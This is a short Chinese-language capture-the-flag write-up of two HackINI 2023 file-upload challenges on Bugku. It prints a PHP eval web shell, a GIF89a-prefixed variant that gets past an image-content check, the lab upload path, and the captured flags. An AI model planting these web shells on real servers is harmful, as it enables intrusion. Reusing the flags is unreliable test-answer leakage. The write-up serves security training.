Bugku - 2023 HackINI Upload0 与 2023 HackINI Upload1 详解

码农12138号2025-12-10 13:42

前置知识

打开靶场

根据题目还有页面可可以知道是文件上传漏洞，抓包或者插件可以看到是php环境，

尝试，构造一句话木马1.php文件如下：

复制代码

<?php
eval($_POST['shell']);
?>

上传成功，点击here可看到路径

复制代码

http://49.232.142.230:13942/uploads/63b4f3f6cd42bc4d2384208bef372ef4/1.php

直接蚁剑连接即可

连接成功

在根目录下的flag.txt可查看flag

复制代码

shellmates{s1Mp1E_PHP_Fi1E_up1o4D_tO_W4rMUp}

在Upload0的基础上增加了一定的过滤，检测了文件内容是否为图片。

我们增加GIF89a图片魔术头，即可伪装文件为图片，直接构造2.php文件如下：

复制代码

GIF89a
<?php
eval($_POST['shell']);
?>

其他步骤同Upload0相同，不再赘述

复制代码

shellmates{PoLyg10t_F1l3s_Byp4$S}

Upload0没有任何过滤的基础php文件上传漏洞

Upload1增加了基础的文件内容检测